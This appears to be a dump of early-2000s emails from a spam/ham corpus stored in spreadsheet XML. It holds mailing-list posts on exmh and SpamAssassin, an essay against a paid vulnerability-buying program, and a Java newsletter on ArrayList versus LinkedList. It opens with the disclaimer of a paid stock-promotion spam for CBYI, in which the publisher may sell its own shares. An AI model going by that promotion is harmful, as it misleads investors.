 &lt;/A&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/A&gt;&lt;/A&gt;&lt;/A&gt;&lt;/P&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/LI&gt;
                &lt;/TD&gt;
            &lt;/TR&gt;
        &lt;/TABLE&gt;
 &lt;P&gt;      
       &lt;FONT size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;      
       &lt;FONT size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;      
       &lt;FONT size=3D1&gt;Certain statements contained in this news release m=
 ay be 
 forward-looking statements within the meaning of The Private Securities=
 Litigation Reform Act of 1995. These statements may be identified by su=
 ch terms 
 as =22expect=22, =22believe=22, =22may=22, =22will=22, and =22intend=22 or simila=
 r terms. We are NOT 
 a registered investment advisor or a broker dealer. This is NOT an offe=
 r to buy 
 or sell securities. No recommendation that the securities of the compan=
 ies 
 profiled should be purchased, sold or held by individuals or entities t=
 hat learn 
 of the profiled companies. We were paid =2427,000 in cash by a third par=
 ty to 
 publish this report. Investing in companies profiled is high-risk and u=
 se of 
 this information is for reading purposes only. If anyone decides to act=
  as an 
 investor, then it will be that investor's sole risk. Investors are advi=
 sed NOT 
 to invest without the proper advisement from an attorney or a registere=
 d 
 financial broker. Do not rely solely on the information presented, do a=
 dditional 
 independent research to form your own opinion and decision regarding in=
 vesting 
 in the profiled companies. Be advised that the purchase of such high-ri=
 sk 
 securities may result in the loss of your entire investment.&lt;/FONT&gt;    =
       &lt;FONT 
 size=3D1&gt;The owners of this publication may already own free trading sha=
 res in 
 CBYI and may immediately sell all or a portion of these shares into the=
  open 
 market at or about the time this report is published.&amp;nbsp; Factual sta=
 tements 
 are made as of the date stated and are subject to change without notice=
 .&amp;nbsp; 
 Not intended for recipients or residents of CA,CO,CT,DE,ID,      
       &lt;FONT 
 size=3D1&gt;IL,IA,LA,MO,NV,NC,OK,OH,PA,RI,TN,VA,WA,WV,WI. Void where 
 prohibited.&amp;nbsp;&lt;/FONT&gt;      
       &lt;FONT size=3D1&gt;Copyright c 2001&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
    &lt;/BODY&gt;
 &lt;/HTML&gt;
 **********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</si>
  <si>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Exmh &amp;&amp; speed
</t>
  </si>
  <si>
    <t xml:space="preserve">
 lately I've got the feeling that exmh is getting slower and slower. I 
 just decided to check that vs. reality, and yes, speed has left the 
 scene somewhere between the release of 2.5 and now.
 I checked on a number of small messages in a big folder (~10000 
 msgs). The delay of the Next button has increased considerably:
 2.5-release: 350-450 msec
 latest cvs: 1000-12000 msec
 Frankly I think this is getting close to non-acceptable since the 
 user settings hasn't changed.
 Anybody have any ideas where performance disappeared?
 /Anders
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: the underground software vulnerability marketplace and its hazards
</t>
  </si>
  <si>
    <t xml:space="preserve">On August 7th, an entity known as "iDEFENSE" sent out an announcement,
 which is appended to this email.  Briefly, "iDEFENSE", which bills
 itself as "a global security intelligence company", is offering cash
 for information about security vulnerabilities in computer software
 that are not publicly known, especially if you promise not to tell
 anyone else.
 If this kind of secret traffic is allowed to continue, it will pose a
 very serious threat to our computer communications infrastructure.
 At the moment, the dominant paradigm for computer security research
 known as "full disclosure"; people who discover security
 vulnerabilities in software tell the vendor about them, and a short
 while later --- after the vendor has had a chance to fix the problem
 --- they publish the information, including code to exploit the
 vulnerability, if possible.  
 This method has proven far superior to the old paradigm established by
 CERT in the late 1980s, which its proponents might call "responsible
 disclosure" --- never release working exploit code, and never release
 any information on the vulnerability before all vendors have released
 a patch.  This procedure often left hundreds of thousands of computers
 vulnerable to known bugs for months or years while the vendors worked
 on features, and often, even after the patches were released, people
 wouldn't apply them because they didn't know how serious the problem
 was.
 The underground computer criminal community would often discover and
 exploit these same holes for months or years while the "responsible
 disclosure" process kept their victims, who had no connections in the
 underground, vulnerable.
 The problem with this is that vulnerabilities that are widely known
 are much less dangerous, because their victims can take steps to
 reduce their potential impact --- including disabling software,
 turning off vulnerable features, filtering traffic in transit, and
 detecting and responding to intrusions.  They are therefore much less
 useful to would-be intruders.  Also, software companies usually see
 security vulnerabilities in their software as PR problems, and so
 prefer to delay publication (and the expense of fixing the bugs) as
 long as possible.
 iDEFENSE is offering a new alternative that appears far more dangerous
 than either of the two previous paradigms.  They want to be a buyer in
 a marketplace for secret software vulnerability information, rewarding
 discoverers of vulnerabilities with cash.  
 Not long before, Snosoft, a group of security researchers evidently
 including some criminal elements, apparently made an offer to sell the
 secrecy of some software vulnerability information to the software
 vendor; specifically, they apparently made a private offer to
 Hewlett-Packard to keep a vulnerability in HP's Tru64 Unix secret if
 HP retained Snosoft's "consulting services".  HP considered this
 extortion and responded with legal threats, and Snosoft published the
 information.
 If this is allowed to happen, it will cause two problems which,
 together, add up to a catastrophe.
 First, secret software vulnerability information will be available to
 the highest bidder, and to nobody else.  For reasons explained later,
 I think the highest bidders will generally be organized crime
 syndicates, although that will not be obvious to the sellers.
 Second, finding software vulnerabilities and keeping them secret will
 become lucrative for many more talented people.  The result will be
 --- just as in the "responsible disclosure" days --- that the good
 guys will remain vulnerable for months and years, while the majority
 of current vulnerabilities are kept secret.
 I've heard it argued that the highest bidders will generally be the
 vendors of the vulnerable software, but I don't think that's
 plausible.  If someone can steal $20 000 because a software bug lets
 them, the software vendor is never held liable; often, in fact, the
 people who administer the software aren't liable, either --- when
 credit card data are stolen from an e-commerce site, for example.
 Knowing about a vulnerability before anyone else might save a web-site
 administrator some time, and it might save the software vendor some
 negative PR, but it can net the thief thousands of dollars.
 I think the highest bidders will be those for whom early vulnerability
 information is most lucrative --- the thieves who can use it to
 execute the largest heists without getting caught.  Inevitably, that
 means organized crime syndicates, although the particular gangs who
 are good at networked theft may not yet exist.
 There might be the occasional case where a market leader, such as
 Microsoft, could make more money by giving their competitors bad PR
 than a gang could make by theft.  Think of a remote-root hole in
 Samba, for example.
 Right now, people who know how to find security exploits are either
 motivated by personal interest in the subject, motivated by the public
 interest, motivated by a desire for individual recognition, or
 personally know criminals that benefit from their exploits.  Creating
 a marketplace in secret vulnerability information would vastly
 increase the availability of that information to the people who can
 afford to pay the most for it: spies, terrorists, and organized crime.
 Let's not let that happen.
 This is the original iDEFENSE announcement:
 From: Sunil James [mailto:SJames@iDefense.com]
 Sent: Wednesday, August 07, 2002 12:32 PM
 Subject: Introducing iDEFENSE's Vulnerability Contributor Program
 Greetings,
 iDEFENSE is pleased to announce the official launch of its Vulnerability
 Contributor Program (VCP). The VCP pays contributors for the advance
 notification of vulnerabilities, exploit code and malicious code.
 iDEFENSE hopes you might consider contributing to the VCP. The following
 provides answers to some basic questions about the program:
 Q. How will it work?
 A. iDEFENSE understands the majority of security researchers do not publish
 security research for compensation; rather, it could be for any of a number
 of motivations, including the following:
          * Pure love of security research
          * The desire to protect against harm to targeted networks
          * The desire to urge vendors to fix their products
          * The publicity that often accompanies disclosure
 The VCP is for those who want to have their research made public to the
 Internet community, but who would also like to be paid for doing the
 work.The compensation will depend, among other things, on the following
 items:
          * The kind of information being shared (i.e. vulnerability or exploit)
          * The amount of detail and analysis provided
          * The potential severity level for the information shared
          * The types of applications, operating systems, and other
            software and hardware potentially affected
          * Verification by iDEFENSE Labs
          * The level of exclusivity, if any, for data granted to iDEFENSE
 Q. Who should contribute to the VCP?
 A. The VCP is open to any individual, security research group or other
 entity.
 Q. Why are you launching this program?
 A. Timeliness remains a key aspect in security intelligence. Contributions
 to some lists take time before publication to the public at large. More
 often, many of these services charge clients for access without paying the
 original contributor. Under the iDEFENSE program, the contributor is
 compensated, iDEFENSE Labs verifies the issue, and iDEFENSE clients and the
 public at large are warned in a timely manner.
 Q. Who gets the credit?
 A. The contributor is always credited for discovering the vulnerability or
 exploit information.
 Q. When can I contribute?
 The VCP is active. You are welcome to begin contributing today.
 To learn more, go to http://www.idefense.com/contributor.html. If you have
 questions or would like to sign up as a contributor to the VCP, please
 contact us at contributor@idefense.com.
 Regards,
 Sunil James
 Technical Analyst
 iDEFENSE
 "iDEFENSE is a global security intelligence company that proactively
 monitors sources throughout the world -- from technical vulnerabilities and
 hacker profiling to the global spread of viruses and other malicious code.
 The iALERT security intelligence service provides decision-makers, frontline
 security professionals and network administrators with timely access to
 actionable intelligence and decision support on cyber-related threats.
 iDEFENSE Labs is the research wing that verifies vulnerabilities, examines
 the behavior of exploits and other malicious code and discovers new
 software/hardware weaknesses in a controlled lab environment."
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] URL blacklist
</t>
  </si>
  <si>
    <t xml:space="preserve">
 SpamTalk said:
 &gt; Probably better than the "spam phrases" approach would be the database
 &gt; approach as currently used for white/black listing.
 &gt; Any way to tie that to an XML retrieval from a list of central repositories?
 &gt; Does mySQL do replication? A properly done XML would let us eyeball the list
 &gt; as well as use it to keep the database up to date.
 &gt; Another idea: could we synthesize an RBL so that
 &gt; http://www.spammer.com/spam/web/bug/ becomes spam.web.bug.x.www.spammer.com
 &gt; for a reverse lookup? It is going to get tricky, how to specify a randomized
 &gt; intermediate directory?
 A good plan, needs an implementation though: 
         http://bl.reynolds.net.au/ksi/email/
 hmm. seems down to me.  Basically it's a plan to store hash sums of
 URLs/phone numbers found in spam in a DNSBL, for apps like SpamAssassin to
 look up.  A little like spamcop's "spamvertized URL" list...
 --j.
 -------------------------------------------------------
 This sf.net email is sponsored by: DEDICATED SERVERS only $89!
 Linux or FreeBSD, FREE setup, FAST network. Get your own server 
 today at http://www.ServePath.com/indexfm.htm
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: problems with 'apt-get -f install'
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Lance wrote :
 &gt; I have failed dependencies in RPM database to I am unable to use
 &gt; apt-get.  I requests to run 'apt-get -f install' to fix these
 &gt; dependencies, however, I get these errors when running 'apt-get -f
 &gt; install' :
 [...]
 &gt; error: unpacking of archive failed on file
 &gt; /usr/share/libgcj.zip;3c5b5e75: cpio: MD5 sum mismatch
 &gt; E: Sub-process /bin/rpm returned an error code (1)
 &gt; [root@localhost root]# 
 I'd say that the file apt downloaded is corrupted. Maybe trying "apt-get
 clean" to remove all downloaded files first would solve the problem.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</si>
  <si>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No more spell-check
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 my exmh-2.5 suddenly will not spell-check anymore. If I click More..., Spell...
 a window opens and is gone just as fast.
 I don't recall having tinkered with anything.
 How can I get spell-checking back?
 If you explain please do it so a standard PC user will understand.
 Thanks in advance!
 -- 
 Peter
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Adam L. Beberg wrote:
 &gt; Did someone invert the spam filters? I'm getting almost nothing but spam on
 &gt; fork now...
 SPAM ASSASSIN.
 Someone of your highly developed intelligence should have no problems
 installing such a well-known and commonly used program.
 I personally still think the solution is to restrict posting to members.
 But I guess my brown shirt is showing again.
 - Joe
 P.S. I hate everybody.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: spamassassin mailbox delivery problem
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 when testing spamassassin, i found a little problem but
 I don't know if it's spamassassin or my pop3-server
 that caused it.
 Pop3-servers seem to expect a blank line before "From "-lines
 to seperate mails in a mailbox-file.
 Spamassassin does not add such a blank line before
 mails delivered directly to mailbox.
 Result is that the pop3-server (tested with qpopper4 and
 cucipop) delivers some mails glued together.
 I think the solution is to write a blank line to the mailbox
 befor spamassassin adds the filtered mail.
 Please tell me if you're not the right man for this,
  if i'm totally wrong or if you're sure, the pop3-server
  shouldn't insist on a blank line before "From "-lines.
 Thank you.
 PS: Mailserver ist postfix-1.1.11
 Regards,
 -- 
 Frank Burkhardt &lt;burk@cns.mpg.de&gt;   phone: +49 341 9940-142
                                     fax  : +49 341 9940-221
 Max Planck Institute
 of Cognitive Neuroscience           /"\
 Muldentalweg 9                      \ / ASCII Ribbon Campain
 04828 Bennewitz, Germany             X  against HTML Mail
                                     / \
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Core Java Technologies Tech Tips, September 10, 2002 (ArrayList vs. LinkedList, Zero-Length Arrays)
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;
 Core Java Technologies Technical Tips
 &lt;/title&gt;
 &lt;style type="text/css"&gt;
 CODE {color: #333333; font-family: Verdana, Courier, Monospace; font-size: 10pt}
 PRE {color: #333333; font-family: Verdana, Courier, Monospace; font-size: 10pt}
 BODY, div, span {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 td, th {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 tr {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 table {font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 p {color: #333333; font-family: arial,helvetica,sans-serif; font-size: 10pt}
 li {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 br {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 div {color: #666699; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 sup {font-family: Arial, Helvetica, sans-serif; font-size: 5pt}
 h3 {color: #666699; font-family: Arial, Helvetica, sans-serif; font-size: 11pt}
 h4, h5, h6 {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 blockquote, input, select {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 ul, ol, font {color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 a:link {font-size: 10pt; font-family: Arial, Helvetica, sans-serif; color:#666699 }
 span.purple {font-weight: bold; color: #666699; font-family: Arial, Helvetica, sans-serif; font-size: 10pt}
 span.small {font-size: 8pt; font-family: Arial, Helvetica, sans-serif; color:#333333 }
 span.link {font-size: 8pt; font-family: Arial, Helvetica, sans-serif; color:#666699 }
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff"&gt;
 &lt;a name="top"&gt;&lt;/a&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="611"&gt;
 &lt;tr&gt;
 &lt;td colspan="3" bgcolor="#cccccc" width="1"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" width="1" height="1" border="0" alt="image"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#cccccc" width="1"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" width="1" height="1" border="0" alt="image"&gt;&lt;/td&gt;
 &lt;td&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="611"&gt;
 &lt;tr&gt;
 &lt;td colspan="2"&gt;
 &lt;img src="http://developer.java.sun.com/images/headers/core_ttips_hdr.jpg" width="611" height="160" alt="Core Java Technologies Technical Tips" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="2" bgcolor="#cccccc" width="1"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" width="1" height="1" border="0" alt="image"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- ================== --&gt;
 &lt;!-- Start Main Content --&gt;
 &lt;!-- ================== --&gt;
 &lt;tr&gt;
 &lt;td height="20"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;a href="http://developer.java.sun.com/developer/TechTips/txtarchive/2002/Sept02_GlenM.txt?s=04&amp;w=37" style="text-decoration:none;"&gt;View this issue as simple text&lt;/a&gt;&lt;/td&gt;
 &lt;td align="right" height="20"&gt;&lt;span class="purple"&gt;September 10, 2002&lt;/span&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan="2"&gt;
 &lt;FORM METHOD="GET" ACTION="http://search.java.sun.com/search/java/"&gt;
 &lt;table border="0" cellpadding="10" cellspacing="0" width="100%"&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;table border="0" cellpadding="10" cellspacing="0" width="100%"&gt;
 &lt;tr&gt; 
 &lt;td align="left" VALIGN="middle" width="20%"&gt;&lt;h3&gt;In this Issue&lt;/h3&gt;&lt;/td&gt;
 &lt;td valign="middle" align="right" width="65%"&gt;
 &lt;font size="2"&gt;
 &lt;INPUT TYPE="text" SIZE="15" MAXLENGTH="128" NAME=qt&gt;&lt;/FONT&gt;&lt;/td&gt;
 &lt;td VALIGN="middle" WIDTH="55"&gt;
 &lt;INPUT TYPE="image" SRC="http://developer.java.sun.com/images/search.button.gif" ALT="Search" value="search" BORDER="0" WIDTH="55"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/FORM&gt;
 &lt;p&gt;
 WELCOME to the Core Java&lt;sup&gt;TM&lt;/sup&gt; Technologies Tech Tips, September 10, 2002. Here you'll get tips on using core Java technologies and APIs, such as those in Java 2 Platform, Standard Edition (J2SE&lt;sup&gt;TM&lt;/sup&gt;).
 &lt;/p&gt;
 &lt;p&gt;
 &lt;a href="#1"&gt;&lt;img src="http://developer.java.sun.com/images/anchor.gif" border="0" alt=""&gt;Using ArrayList and LinkedList&lt;/a&gt;
 &lt;br&gt;    
 &lt;a href="#2"&gt;&lt;img src="http://developer.java.sun.com/images/anchor.gif" border="0" alt=""&gt;Using Zero-Length Arrays&lt;/a&gt;
 &lt;/p&gt;
 &lt;p&gt;
 These tips were developed using Java 2 SDK, Standard Edition, v 1.4.
 &lt;/p&gt;
 &lt;p&gt;
 This issue of the JDC Tech Tips is written by Glen McCluskey.
 &lt;/p&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
 &lt;!-- Grey Horizontal Line Begins Here --&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#cccccc" height="1"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" width="1" height="1" ALT="Pixel" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt; 
 &lt;!-- Grey Horizontal Line ends Here --&gt;
 &lt;a name="1"&gt;&lt;/a&gt;
 &lt;h3&gt;USING ARRAYLIST AND LINKEDLIST&lt;/h3&gt;
 &lt;p&gt;
 &lt;code&gt;ArrayList&lt;/code&gt; and &lt;code&gt;LinkedList&lt;/code&gt; are two &lt;code&gt;Collections&lt;/code&gt; classes used for storing lists of object references. For example, you could have an &lt;code&gt;ArrayList&lt;/code&gt; of Strings, or a &lt;code&gt;LinkedList&lt;/code&gt; of Integers. This tip compares the performance of &lt;code&gt;ArrayList&lt;/code&gt; and &lt;code&gt;LinkedList&lt;/code&gt;, and offers some suggestions about which of these classes is the right choice in a given situation.
 &lt;/p&gt;
 &lt;p&gt;
 The first key point is that an &lt;code&gt;ArrayList&lt;/code&gt; is backed by a primitive &lt;code&gt;Object&lt;/code&gt; array. Because of that, an &lt;code&gt;ArrayList&lt;/code&gt; is much faster than a &lt;code&gt;LinkedList&lt;/code&gt; for random access, that is, when accessing arbitrary list elements using the &lt;code&gt;get&lt;/code&gt; method. Note that the &lt;code&gt;get&lt;/code&gt; method is implemented for &lt;code&gt;LinkedLists&lt;/code&gt;, but it requires a sequential scan from the front or back of the list. This scan is very slow. For a &lt;code&gt;LinkedList&lt;/code&gt;, there's no fast way to access the Nth element of the list.
 &lt;/p&gt;
 &lt;p&gt;
 Consider the following example. Suppose you have a large list of sorted elements, either an &lt;code&gt;ArrayList&lt;/code&gt; or a &lt;code&gt;LinkedList&lt;/code&gt;. Suppose too that you do a binary search on the list. The standard binary search algorithm starts by checking the search key against the value in the middle of the list. If the middle value is too high, then the upper half of the list is eliminated. However, if the middle value is too low, then the lower half of the list is ignored. This process continues until the key is found in the list, or until the lower bound of the search becomes greater than the upper bound.
 &lt;/p&gt;
 &lt;p&gt;
 Here's a program that does a binary search on all the elements in an &lt;code&gt;ArrayList&lt;/code&gt; or a &lt;code&gt;LinkedList&lt;/code&gt;:
 &lt;/p&gt;
 &lt;pre&gt;
     import java.util.*;
     public class ListDemo1 {
         static final int N = 10000;
         static List values;
         // make List of increasing Integer values
         static {
            Integer vals[] = new Integer[N];
            Random rn = new Random();
            for (int i = 0, currval = 0; i &amp;lt; N; i++) {
                vals[i] = new Integer(currval);
                currval += rn.nextInt(100) + 1;
            }
            values = Arrays.asList(vals);
         }
         // iterate across a list and look up every
         // value in the list using binary search
         static long timeList(List lst) {
             long start = System.currentTimeMillis();
             for (int i = 0; i &amp;lt; N; i++) {
                // look up a value in the list 
                // using binary search
                int indx = Collections.binarySearch(
                                    lst, values.get(i));
                // sanity check for result 
                // of binary search
                if (indx != i) {
                    System.out.println(
                                     &amp;quot;*** error ***\n&amp;quot;);
                }
            }
            return System.currentTimeMillis() - start;
        }
        public static void main(String args[]) {
            // do lookups in an ArrayList 
            System.out.println(&amp;quot;time for ArrayList = &amp;quot; +
                timeList(new ArrayList(values)));
            // do lookups in a LinkedList
            System.out.println(
                &amp;quot;time for LinkedList = &amp;quot; +
                timeList(new LinkedList(values)));
        }
     }
 &lt;/pre&gt;
 &lt;p&gt;
 The &lt;code&gt;ListDemo1&lt;/code&gt; program sets up a &lt;code&gt;List&lt;/code&gt; of sorted Integer values. It then adds the values to an &lt;code&gt;ArrayList&lt;/code&gt; or a &lt;code&gt;LinkedList&lt;/code&gt;. Then &lt;code&gt;Collections.binarySearch&lt;/code&gt; is used to search for each value in the 
 list.
 &lt;/p&gt;
 &lt;p&gt;
 When you run this program, you should see a result that looks something like this:
 &lt;/p&gt;
 &lt;pre&gt;
     time for ArrayList = 31
     time for LinkedList = 4640
 &lt;/pre&gt;
 &lt;p&gt;
 &lt;code&gt;ArrayList&lt;/code&gt; is about 150 times faster than &lt;code&gt;LinkedList&lt;/code&gt;. (Your results might differ depending on your machine characteristics, but you should see a distinct difference in the result for &lt;code&gt;ArrayList&lt;/code&gt; as compared to that for &lt;code&gt;LinkedList&lt;/code&gt;. The same is true for the other programs in this tip.) Clearly, &lt;code&gt;LinkedList&lt;/code&gt; is a bad choice in this situation. The binary search algorithm inherently uses random access, and &lt;code&gt;LinkedList&lt;/code&gt; does not support fast random access. The time to do a random access in a &lt;code&gt;LinkedList&lt;/code&gt; is proportional to the size of the list. By comparison, random access in an &lt;code&gt;ArrayList&lt;/code&gt; has a fixed time.
 &lt;/p&gt;
 &lt;p&gt;
 You can use the &lt;code&gt;RandomAccess&lt;/code&gt; marker interface to check whether a List supports fast random access:
 &lt;/p&gt;
 &lt;pre&gt;
     void f(List lst) {
         if (lst instanceof RandomAccess) {
             // supports fast random access
         }
     }
 &lt;/pre&gt;
 &lt;p&gt;
 &lt;code&gt;ArrayList&lt;/code&gt; implements the &lt;code&gt;RandomAccess&lt;/code&gt; interface, and &lt;code&gt;LinkedList&lt;/code&gt;. does not. Note that &lt;code&gt;Collections.binarySearch&lt;/code&gt; does take advantage of the &lt;code&gt;RandomAccess&lt;/code&gt; property, to optimize searches.
 &lt;/p&gt;
 &lt;p&gt;
 Do these results prove that &lt;code&gt;ArrayList&lt;/code&gt; is always a better choice? Not necessarily. There are many cases where &lt;code&gt;LinkedList&lt;/code&gt; does better. Also note that there are many situations where an algorithm can be implemented efficiently for &lt;code&gt;LinkedList&lt;/code&gt;. An example is reversing a &lt;code&gt;LinkedList&lt;/code&gt; using &lt;code&gt;Collections.reverse&lt;/code&gt;. The internal algorithm does this, and gets reasonable performance, by using forward and backward iterators.
 &lt;/p&gt;
 &lt;p&gt;
 Let's look at another example. Suppose you have a list of elements, and you do a lot of element inserting and deleting to the list. In this case, &lt;code&gt;LinkedList&lt;/code&gt; is the better choice. To demonstrate that, consider the following &amp;quot;worst case&amp;quot; scenario. In this demo, a program repeatedly inserts elements at the beginning of a list. The code looks like this:
 &lt;/p&gt;
 &lt;pre&gt;
     import java.util.*;
     public class ListDemo2 {
         static final int N = 50000;
         // time how long it takes to add 
         // N objects to a list
         static long timeList(List lst) {
             long start = System.currentTimeMillis();
             Object obj = new Object();
             for (int i = 0; i &amp;lt; N; i++) {
                 lst.add(0, obj);
             }
             return System.currentTimeMillis() - start;
         }
         public static void main(String args[]) {
             // do timing for ArrayList
             System.out.println(
                 &amp;quot;time for ArrayList = &amp;quot; +
                 timeList(new ArrayList()));
             // do timing for LinkedList
             System.out.println(
                 &amp;quot;time for LinkedList = &amp;quot; +
                 timeList(new LinkedList()));
         }
     } 
 &lt;/pre&gt;
 &lt;p&gt;
 When you run this program, the result should look something like this:
 &lt;/p&gt;
 &lt;pre&gt;
     time for ArrayList = 4859
     time for LinkedList = 125
 &lt;/pre&gt;
 &lt;p&gt;
 These results are pretty much the reverse of the previous example.
 &lt;/p&gt;
 &lt;p&gt;
 When an element is added to the beginning of an &lt;code&gt;ArrayList&lt;/code&gt;, all of the existing elements must be pushed back, which means a lot of expensive data movement and copying. By contrast, adding an element to the beginning of a &lt;code&gt;LinkedList&lt;/code&gt; simply means allocating an internal record for the element and then adjusting a couple of links. Adding to the beginning of a &lt;code&gt;LinkedList&lt;/code&gt; has fixed cost, but adding to the beginning of an &lt;code&gt;ArrayList&lt;/code&gt; has a cost that's proportional to the list size.
 &lt;/p&gt;
 &lt;p&gt;
 So far, this tip has looked at speed issues, but what about space? Let's look at some internal details of how &lt;code&gt;ArrayList&lt;/code&gt; and &lt;code&gt;LinkedList&lt;/code&gt; are implemented in Java 2 SDK, Standard Edition v 1.4. These details are not part of the external specification of these classes, but are illustrative of how such classes work internally.
 &lt;/p&gt;
 &lt;p&gt;
 The &lt;code&gt;LinkedList&lt;/code&gt; class has a private internal class defined like this:
 &lt;/p&gt;
 &lt;pre&gt;
     private static class Entry {
         Object element;
         Entry next;
         Entry previous;
     } 
 &lt;/pre&gt;
 &lt;p&gt;
 Each &lt;code&gt;Entry&lt;/code&gt; object references a list element, along with the next and previous elements in the &lt;code&gt;LinkedList&lt;/code&gt; -- in other words, a doubly-linked list. A &lt;code&gt;LinkedList&lt;/code&gt; of 1000 elements will have 1000 &lt;code&gt;Entry&lt;/code&gt; objects linked together, referencing the actual list elements. There is significant space overhead in a &lt;code&gt;LinkedList&lt;/code&gt; structure, given all these &lt;code&gt;Entry&lt;/code&gt; objects.
 &lt;/p&gt;
 &lt;p&gt;
 An &lt;code&gt;ArrayList&lt;/code&gt; has a backing &lt;code&gt;Object&lt;/code&gt; array to store the elements. This array starts with a capacity of 10. When the array needs to grow, the new capacity is computed as:
 &lt;/p&gt;
 &lt;pre&gt;
     newCapacity = (oldCapacity * 3) / 2 + 1;
 &lt;/pre&gt;
 &lt;p&gt;
 Notice that the array capacity grows each time by about 50%. This means that if you have an &lt;code&gt;ArrayList&lt;/code&gt; with a large number of elements, there will be a significant amount of space wasted at the end. This waste is intrinsic to the way &lt;code&gt;ArrayList&lt;/code&gt; works. If there was no spare capacity, the array would have to be reallocated for each new element, and performance would suffer dramatically. Changing the growth strategy to be more aggressive (such as doubling the size at each reallocation) would result in slightly better performance, but it would waste more space.
 &lt;/p&gt;
 &lt;p&gt;
 If you know how many elements will be in an &lt;code&gt;ArrayList&lt;/code&gt;, you can specify the capacity to the constructor. You can also call the &lt;code&gt;trimToSize&lt;/code&gt; method after the fact to reallocate the internal array. This gets rid of the wasted space.
 &lt;/p&gt;
 &lt;p&gt;
 So far, this discussion has assumed that either an &lt;code&gt;ArrayList&lt;/code&gt; or a &lt;code&gt;LinkedList&lt;/code&gt; is &amp;quot;right&amp;quot; for a given application. But sometimes, other choices make more sense. For example, consider the very common situation where you have a list of key/value pairs, and you would like to retrieve a value for a given key.
 &lt;/p&gt;
 &lt;p&gt;
 You could store the pairs in an N x 2 &lt;code&gt;Object&lt;/code&gt; array. To find the right pair, you could do a sequential search on the key values. This approach works, and is a useful choice for very small lists (say 10 elements or less), but it doesn't scale to big lists.
 &lt;/p&gt;
 &lt;p&gt;
 Another approach is to sort the key/value pairs by ascending key value, store the result in a pair of &lt;code&gt;ArrayLists&lt;/code&gt;, and then do a binary search on the keys list. This approach also works, and is very fast. Yet another approach is to not use a list structure at all, but instead use a map structure (hash table), in the form of a &lt;code&gt;HashMap&lt;/code&gt;.
 &lt;/p&gt;
 &lt;p&gt;
 Which is faster, a binary search on an &lt;code&gt;ArrayList&lt;/code&gt;, or a &lt;code&gt;HashMap&lt;/code&gt;? Here's a final example that compares these two:
 &lt;/p&gt;
 &lt;pre&gt;
     import java.util.*;
     public class ListDemo3 {
         static final int N = 500000;
         // Lists of keys and values
         static List keys;
         static List values;
         // fill the keys list with ascending order key 
         // values and fill the values list with
         // corresponding values (-key)
         static {
             Integer keyvec[] = new Integer[N];
             Integer valuevec[] = new Integer[N];
             Random rn = new Random();
             for (int i = 0, currval = 0; i &amp;lt; N; i++) {
                 keyvec[i] = new Integer(currval);
                 valuevec[i] = new Integer(-currval);
                 currval += rn.nextInt(100) + 1;
             }
             keys = Arrays.asList(keyvec);
             values = Arrays.asList(valuevec);
         }
         // fill a Map with key/value pairs
         static Map map = new HashMap();
         static {
             for (int i = 0; i &amp;lt; N; i++) {
                 map.put(keys.get(i), values.get(i));
             }
         }
         // do binary search lookup of all keys
